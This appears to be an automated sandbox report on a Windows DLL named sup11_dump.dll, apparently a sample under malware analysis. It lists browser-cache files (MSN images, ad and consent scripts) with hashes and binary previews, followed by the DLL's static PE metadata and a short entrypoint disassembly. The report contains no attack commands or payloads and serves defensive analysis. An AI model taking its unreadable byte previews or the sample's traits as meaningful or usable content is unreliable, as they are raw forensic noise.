Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..KE..KE..R.JZ.Z))E.-.Q@.4.....:/.~...........M%9...At.-....X..k[V.m....n0.........i..i...#u.-#R...i.D.$..e....X...H0.5{..H...iZ.M)l4ii).^'.5.tq.c.y7L..+V.....J.-..\|...o.y...V.+..F.B..W_/J..-\|.....*Y...{X..tb..j<`..x...)..p4.....Lj..(.t..).v.QK^...QE...Q@.E.P..E......P.....M.....I.5.U....M9......K1...Ux...P.2.J.}.6.-..._..Uk.9..\ ...JZ+r...4...=....^..X

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1d6e2V[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	18588
Entropy (8bit):	7.957023833071061
Encrypted:	false
SSDEEP:	384:e3CcHEApuE3LKWNIr6SJXndlsb//ywaKKYHGyg26u5AuA1tL7FcXOer:e5Ee3xmr6Alsb//xaNYHGBtuA1tLBcec
MD5:	FD49F95F53033CB011C6BB3FB5709881
SHA1:	580D4A825C16AA3B94DD4129C843471496A86AC9
SHA-256:	789890A0C5B94B028377850318479FCEEED19A751863973E42AB8C9B47C3B73C
SHA-512:	DFC03B8F70B41830DFB247D5606C2CD254C8A8B4B305CBF9C601EC6C5F26AE20EFD6F37F6FD153F04933F2BB5B5B0A8BA450F6092C164BE14E29FC7F758CE915
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d6e2V.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..et.QD........q...W,.. ].4..S.YA...n.Z.....ju..d.G2d..E>.(.b..[....H...W........Q..d...1......... nP@.....L....@..0[w8.......Qnx...H...y7aPgw.P..^u.n]..67._L...q..p.F`.....>.....G.....P.3....7($.lRJ!.P...'...4.t..2e...\.H.P......5,S....''....nA.=..J..?ga.....+dm..1Q..1d.)Rq.O.=..318.........!..0.'.9cf....q.....{..l..T..?.:"ag..V.4....E;o..BT....6G.C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1d71HE[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	10428
Entropy (8bit):	7.953993156902433
Encrypted:	false
SSDEEP:	192:BCUnj0lc97wmCeB2ei4SZekwEdv+Pv5KxK5iAQuW2NR92qyRe1GkE:kcIC9s2B2CSZekf+GiW2NRcqy1
MD5:	5162908F6BE6371EA7CC3F125D4DAA5C
SHA1:	6858089B613DE6D3FF08932B4DD8874C04264B6F
SHA-256:	0F3F1408639F9763F11B6EAA59A57BB0AE75A7C4CBC0AE13EB301249269081A6
SHA-512:	4E35666BD7E038155555381B100E1992252A1FD212CC5931F9BCF1BCB72CEB786CBC8773D58D0FD5B02086828CE235B4607074D9300538BC6909836EE6ACB6A4
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d71HE.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=378&y=142
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Us..u...."....V..7.;U....e>...z.$.>.r.q..4...4......0.i].1Wb.z......?.O......C.~p...-.h..c...hZjB....u2ZN.e....z.U.+?.....o .R...j..jo%.~..Wt.^..^..y....6...f.....(u.....0..X..z...'...!....5.R.ph.Bfi6&p..#.H...p....}..t..~uz.F...Y-.6X._,...pJ.t....".O.....w.7.m.....,.Q...+.@?O...{T...w.V..B.HU. ..q...~t.f.q..G.e....w{....Pl.....=..I.i=O.@.2..Sw.Z>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1d72aY[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	32663
Entropy (8bit):	7.9550483564967385
Encrypted:	false
SSDEEP:	768:rlqPEvt8Z8BNujMfFmZ95ukQbNVX5UqbCoggbTvKj04njVUeW4a:rlqP2AENuj2Fm0h2qbCogGbe00Cga
MD5:	0A99A07EE119A295A8BA68F3111FA3A6
SHA1:	D383B282EDC40D7034D13C6480BC7E1655F69105
SHA-256:	B93DDCFCA9E19EF741958BA48F696A9419897E49BD03A4658D490122D68970EF
SHA-512:	3AA4797228608063D05165BE096CDF6F0FA339E1D02CE7556750E1077DBA5CB6128A79C09138D8DE1B4BDCE702F14805113C18925C296A07737D9675A74E9677
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d72aY.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}.q).........A.....i"...@.F...@(.2..T.SH...F...."<Q.~)q@...L.......z .?..q3o.[....z .?..on.!.K3....}M0#..X..]......=.lS.F(.....)@..b..\R...;.....&+?U.~...!.Em..s.1..ZX.m.r.5."....!...+.u.l.I.E..".b2.8...&L.. .....KO.....;D@.w...g.c.=q..#6...{......W....+..J.W.,0@"..Y.`N;q.........L..M#._.'@.d....._..i'.8.-."e...v4.=(.+....o.A..=i%.8S\|./.......$.+.MjK..ZU....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1d77rq[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	9207
Entropy (8bit):	7.946230727328202
Encrypted:	false
SSDEEP:	192:BC641x+JYvBf3Y39RVfdZwTMSNoyhXBJdz1UhXxpXt9Y/bqy:k6Kx+CZIt3HwYjyhXBJZaL39Ymy
MD5:	1ACC82700A1CA79BABCA59D749BF53FD
SHA1:	B41FD9B1BE0E3DCD4553EBF772DFCA0AF65EC107
SHA-256:	BD24098780BB946E27F760965E72F0FF80E11C4D7EB802B7BCF09953EC0800A3
SHA-512:	78891C877592D490280E0299EB192BE6EFD09FA36AC301EE2253A1C06E85088D63513A6319D5A38B69086E39FC0E0A0472A3348623F6C614DB479950C723F303
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d77rq.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=450&y=215
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........?4..W[..b.+G71.Y....k.f...`.5.......'..9>...\.#..cK..j..<.Djv.;.......q....j.\|A>.f..F.,XV}......bL..........xZ..Gy..,i..\E.@.k.....B..(V#....`^.F)^_i..s......7....,2.+..qVt....H..".<N...=L:...)..@....5.P.Fkr;..r..*Qq.0.z.....sJ^0W.+>O.....+.......q.8..:Q....]....SE..?0 }+.>X=...<....+.M.......I.}.oE.P....7/...o!.If..........D.n..w[...q.X..g.`+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1d77vV[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	6131
Entropy (8bit):	7.914470730680402
Encrypted:	false
SSDEEP:	96:xGAaEg8/9OHyvV1LYTpQfI2vWRU5wX5d05dISPMWbNaP6ZLxz0DuOTLJl956GOVB:xCnEOHyvYefJWp5d6ISkWbNaPwh0p3KN
MD5:	6F7D13F4C42E96EC39997F62CACCDAEE
SHA1:	AE87464EFE17B5BD3DD164FD98507B53031137FB
SHA-256:	5DC1A00497D681F7BC0A33F53DAF75D884C811A0080F74DF1D240E63058375F2
SHA-512:	8656F09E2238D77BA1D2B10F72902CD44BCFBEE51ED8E071B9FFE531B1F43421F3FE4067531292A5A7E5BFBBEDEBC5D48728FC3A44278FFD850E4AAE97DEA5A6
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d77vV.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=622&y=579
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...W..<H..#F\|......Ur.>...w.?V..4....^i......Vu.kjH2.8...i.&.R...F..v_.L....=K.7.....G........I!..........Yc..GP;...jY....q.}.qG:.#5......U~...(...C..I.MX..B..P...ox#.U...S..r3JN...O.)..h..S.... .....H.v1..O...R6.W..8.y6....<7Z.e..g.&.&3....Z.$/p.]q.q@.#....cU&.jf....M.sS.........M.o...\........&$8<f.qu...i.j..ET.'....O]..aon.....4.....X../X.......?SY+........#

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB7hg4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	458
Entropy (8bit):	7.172312008412332
Encrypted:	false
SSDEEP:	12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
MD5:	A4F438CAD14E0E2CA9EEC23174BBD16A
SHA1:	41FC65053363E0EEE16DD286C60BEDE6698D96B3
SHA-256:	9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
SHA-512:	FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..$Mf..j.n.~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T..Z_..'.}..rc....(...9V.&.....\|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..\|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BBIbTiS[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	820
Entropy (8bit):	7.627366937598049
Encrypted:	false
SSDEEP:	24:U/6gJ+qQtUHyxNAM43wuJFnFMDF3AJ12DG7:U/6gMqQtUSxNT43BFnsRACC
MD5:	9B7529DFB9B4E591338CBD595AD12FF7
SHA1:	0A127FA2778A1717D86358F59D9903836FCC602E
SHA-256:	F1A3EA0DF6939526DA1A6972FBFF8844C9AD8006DE61DD98A1D8A2FB52E1A25D
SHA-512:	4154EC25031ED6BD2A8473F3C3A3A92553853AD4DEFBD89DC4DD72546D8ACAF8369F0B63A91E66DC1665CE47EE58D9FDD2C4EEFCC61BF13C87402972811AB527
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbTiS.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.K.Q....m.[.L\.,%I..S......^.^.z..^..{..-.Bz.....MA+...........{W....p.9..;.s....^..z..!...+..#....3.P..p.z5.~..x>.D.].h.~m..Z..c.5..n..w...S."..U.....X.o...;}.f..:.}]`..<S...7.P{k..T.....K.._.E..%x.?eRp..{.....9.......,,..L.......... .......})..._ TM)..Z.mdQ.......sY .q..,.T1.y.,lJ.y...'?...H..Y...SB..2..b.v.ELp....~.u.S...."8..x1{O....U..Q...._.aO.KV.D\..H..G..#..G.@.u.......3...'...sXc.2s.D.B...^z....I....y...E..v.l.M0.&k`.g....C.`..*..Q..L.6.O&`.t@..\|..7.$Zq...J.. X..ib?,.;&.....?..q.Q.,Bq.&......:#O....o..5.A.K..<..'.+.z...V...&. .......r...4t.......g......B.+-..L3....;ng>..}(.....y.....PP.-.q.....TB........\|HR..w..-....F.....p...3.,..x..q..O..D......)..Vd.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BBK9Ri5[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	527
Entropy (8bit):	7.3239256100568495
Encrypted:	false
SSDEEP:	12:6v/78/W/6T+siLF44aPcb1z4+uzUomyawaTcQwvJ4MWX9w:U/6q4PU5Wmy0G4MKi
MD5:	3C1367514C52C7FA2A6B2322096AA4C1
SHA1:	25104E643189C1457A3916E38D7500A48FEEC77C
SHA-256:	6FAD7471DE7E6CD862193B98452DED4E71F617CDC241AFBCF372235B89F925CC
SHA-512:	1EB9B1C27025B4A629D056FDE061FC61ACB7A671ACB82BDC4B1354D7C50D4E02D34F520468F26BA060C3F9239C398D23834FF976CFFA12C4CEE3DB747C366D2A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Ri5.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.K.A........ i..r0.\\.....hkkq..1h.[s..%.Fu. h)..B...].w.....8...{~...U Q.....y.$.g...BM....EZi....j.F.c..e5.+...w;T.......<p.......".:$[8....P..dH...$.......GO%qC.X..`MB.....!.....XcP338.>Q@3.S..y..NP..../\|...f..[..r...F...9...N..S..0Q..m.<.^...>..l...A...6.}....:....^..P...5R...@:U....hN.8.....>....L~.T.&?S.X...0.m.C.,X..A%......X..!.m1.)T..O.*...'.....@.{.]....hF...,..FIY.y%M?;.u....8K6..../Bi\|..?C.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BBO5Geh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	463
Entropy (8bit):	7.261982315142806
Encrypted:	false
SSDEEP:	12:6v/78/W/6T+syMxsngO/gISwEIxclfcwbKMG4Ssc:U/6engigHDm7kNGhsc
MD5:	527B3C815E8761F51A39A3EA44063E12
SHA1:	531701A0181E9687103C6290FBE9CCE4AA4388E3
SHA-256:	B2596783193588A39F9C74A23EE6CA2A1B81F54B735354483216B2EDF1E72584
SHA-512:	0A3E25D472A00FF882F780E7DF1083E4348BCE4B6058DA1B72A0B2903DBC2C53CED08D8247CDA53CE508807FD034ABD8BC5BBF2331D7CE899D4F0F11FD199E0E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs................dIDAT8O.J.A.......,.....v"".....;X.6..J.A,D.h:El...F,lT..DSe.#..$i..3..o.6..3gf..+..\....7..X..1...=.....3.......Y.k-n....<..8...}...8.Rt...D..C).)..$...P....j.^.Qy...FL3...@...yAD...C.\;o6.?.D\|..n.~..h....G2i....J.Zd.c.SA.......l.^P.{....$\..BO.b.km.A.... ...]\|.o_x^. .b.Ci.I.e2.....[..]7.%P61.Q.d...p...@.00..\|`...,..v..=.O.0.u.....@.F.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BBVuddh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	304
Entropy (8bit):	6.758580075536471
Encrypted:	false
SSDEEP:	6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
MD5:	245557014352A5F957F8BFDA87A3E966
SHA1:	9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
SHA-256:	0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
SHA-512:	686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.\|?.....r.\-Ca......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38467
Entropy (8bit):	5.057110721395011
Encrypted:	false
SSDEEP:	768:G1avn4u3hPP4W94hmCMfJpFYXf9wOBEZn3SQN3GFl295oHlrFBllasTT:CQn4uRoWmhPMfJpFYXf9wOBEZn3SQN3w
MD5:	6F1B95424B9E99D0548016F1F83D6A78
SHA1:	0974F3DD2792E9AE6B30D028A5F522761285F9C0
SHA-256:	A9D1D5EB65638B7ACA0F2EFAC46987B0C77EF9B7FEE5019B45F8FE0CAC9132D2
SHA-512:	1A0F217138FADA5D7A11F3C79F0A187D0CC71F19D12C75F52360913A354F9B349AAFF83D4D5A319D447D8C7414654090C214F49B7571CB158DE1BAC6F11ADF37
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1611686653815342249&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1611686653815342249","s":{"_mNL2":{"size":"306x271","viComp":"1611686653815342249","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305234","l2ac":""},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1611686653815342249\")) \|\| (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nrrV63415[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	88151
Entropy (8bit):	5.422933393659934
Encrypted:	false
SSDEEP:	1536:DVnCuukXGsQihGZFu94xdV2E4535nJy0ukWaacUvP+i/TX6Y+fj4/fhAaTZae:DQiYpdVG7tubpKY+fjwZ
MD5:	58A026779C60669E6C3887D01CFD1D80
SHA1:	FBD57BDE06C3D832CC3CB10534E22DCFC7122726
SHA-256:	E4F1EDDBAD7B7F149B602330BD1D05299C3EB9F3ECB4ABD5694D02025A9559C9
SHA-512:	263AD21199F2F5EB3EF592E80D9D0BD898DED3FAFFDD14C34B1D5641D0ABD62FB03F0A738B88681FB3B65B5C698B5D6294DD0D8EAAED9E102B50B9D1DB6E6E8F
Malicious:	false
IE Cache URL:	https://contextual.media.net/48/nrrV63415.js
Preview:	var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]\|\|(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)\|\|""===n\|\|null===n\|\|(n=t,"[object Array]"!==Object.prototype.toString.call(n))\|\|!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	372457
Entropy (8bit):	5.219562494722367
Encrypted:	false
SSDEEP:	6144:B0C8zZ5OVNeBNWabo7QtD+nKmbHgtTVfwBSh:B4zj7BNWaRfh
MD5:	DA186E696CD78BC57C0854179AE8704A
SHA1:	03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21
SHA-256:	F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
SHA-512:	4DE19D4040E28177FD995D56993FFACB9A2A0A7AAB8265BD1BBC7400C565BC73CD61B916D23228496515C237EEA14CCC46839F507879F67BA510D97F46B63557
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
Preview:	/** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf \|\| { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } \|\| function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign \|\| function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a \|\| Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i \|\| [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.01203376624661
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sup11_dump.dll
File size:	61440
MD5:	92bcb08ab6be032cd4a64ac1292c2d16
SHA1:	dd1ee07155768a8d4b0cb1ec3fa666b5ac7e2eed
SHA256:	50ec326918e3930b8099b483ecf0a44bebba1fc7013cc234f2fbc358acb26fe5
SHA512:	29ba30a85fb276cf34669ddbf54e0bfe7b32abae4f3f217fc7754841e9fee1ee24c363d5eb5213740aa5c8b7a4831a5e9849b904d6182a07fe76c609f84d7aee
SSDEEP:	1536:GXvA5MoNRR/4DwOffSuekSjumPUtjxH8ITDM:GX45MGX/4bcu7tjp8J
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z.............q........n.............D.......D.......D........q.......q.......q......Rich............PE..L...T.._...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x40146a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x5FE08054 [Mon Dec 21 11:00:36 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	8bd3516d6fbaada236bf3f0ea3a6d71f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+0Ch]
push ebx
push esi
xor ebx, ebx
push edi
inc ebx
xor edi, edi
sub eax, edi
mov dword ptr [ebp-04h], ebx
je 00007F715C800015h
dec eax
jne 00007F715C80005Fh
push 00404108h
call dword ptr [00403048h]
cmp eax, ebx
jne 00007F715C80004Ch
push edi
push 00400000h
push edi
call dword ptr [00403040h]
cmp eax, edi
mov dword ptr [00404110h], eax
je 00007F715C7FFFE0h
mov eax, dword ptr [ebp+08h]
mov esi, 00404118h
mov dword ptr [00404130h], eax
mov eax, esi
lock xadd dword ptr [eax], ebx
mov ecx, dword ptr [ebp+10h]
lea eax, dword ptr [ebp+0Ch]
push eax
push edi
call 00007F715C7FFEE8h
push eax
push 0040154Ah
push edi
push edi
call dword ptr [0040304Ch]
cmp eax, edi
mov dword ptr [0040410Ch], eax
jne 00007F715C7FFFFBh
